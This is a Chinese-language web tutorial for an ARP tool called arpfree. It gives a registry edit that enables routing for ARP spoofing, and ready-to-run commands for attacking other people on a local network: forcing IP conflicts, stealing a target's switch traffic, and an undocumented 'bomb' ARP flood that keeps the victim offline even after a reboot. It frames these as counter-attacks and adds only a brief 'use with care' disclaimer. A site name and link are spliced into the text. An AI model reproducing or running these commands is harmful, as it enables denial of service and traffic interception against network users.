如果要使用ARP欺騙,必須啟動(dòng)ip路由功能,修改(添加)注冊(cè)表選項(xiàng):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
下面的朋友發(fā)現(xiàn)打開網(wǎng)卡失敗,原因可能就是這個(gè).
發(fā)送的時(shí)候可以選擇ARP的TYPE,
使立刻死機(jī)的教程
。如果是ARP請(qǐng)求報(bào)文,則只要輸入要問的IP地址如果是ARP應(yīng)答報(bào)文則要輸入發(fā)送端的IP以及對(duì)方詢問MAC地址對(duì)應(yīng)的IP地址
最后的發(fā)送速度可選參數(shù)為:(大小寫敏感..我覺得挺不好的)
fast----------最快
hear---------每60MS一個(gè)包(可能是比較適合結(jié)合SNIFFER做監(jiān)聽)
slowhear---每500MS一個(gè)包
auto---------每1秒一個(gè)包
slow---------每2秒個(gè)包
使用方法如下:
***********************************************************************
* (1)Send arp packet in "request mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
* | | | | |
* your mac address | | | |
* destnation mac | | speed
* arp type |
* |
* your ip address
***********************************************************************
* (2)Send arp packet in "reply mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto
* | | | | | |
* your mac address | | | | |
* destnation mac | | | speed
* arp type | |
* | |
* your ip address |
* |
* the ip address of destnation mac
***********************************************************************
補(bǔ)充:反擊“LAN終結(jié)者”的辦法:
反擊“終結(jié)者”有幾個(gè)辦法:
1:發(fā)動(dòng)比他更強(qiáng)烈的攻擊:
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
|
|
這里是你想攻擊的人的IP地址
2:交換機(jī)競(jìng)爭(zhēng):
arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
|
|
這里是你想攻擊的人的MAC地址
1:情況將導(dǎo)致他IP地址沖突(比“終結(jié)者”來(lái)的猛烈多了)
2:情況將使得他無(wú)法連接網(wǎng)絡(luò)(由于交換機(jī)把他的流量都給你了)
———————————更-----新----消-----息—————————————————————
因?yàn)橛信笥逊从吃诜墙粨Q環(huán)境下,如使用HUB的情況下,無(wú)法對(duì)目標(biāo)進(jìn)行打擊
故于2006年4月5日更新附件“arpfree.rar”
增加參數(shù)“bomb”,使用方法如下:
假設(shè),目標(biāo)為IP:192.168.237.109 目標(biāo)mac為:011a8575a436
攻擊命令如下:
arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb
其實(shí)就是進(jìn)行簡(jiǎn)單的ARP DOS攻擊,快速刷新目標(biāo)的ARP緩存,可以在消耗自身較少系統(tǒng)資源的情況下
造成和PDOS工具類似的效果,并且如果你不停止攻擊,對(duì)方重啟以后也無(wú)法正常進(jìn)入系統(tǒng)
(當(dāng)然前提是他沒拔網(wǎng)線),
電腦資料
《使立刻死機(jī)的教程》(http://m.msguai.com)。其實(shí)這樣做是十分不厚道的....所以參數(shù)就沒有寫在程序的 HELP 里面;此文僅供參考,請(qǐng)慎用!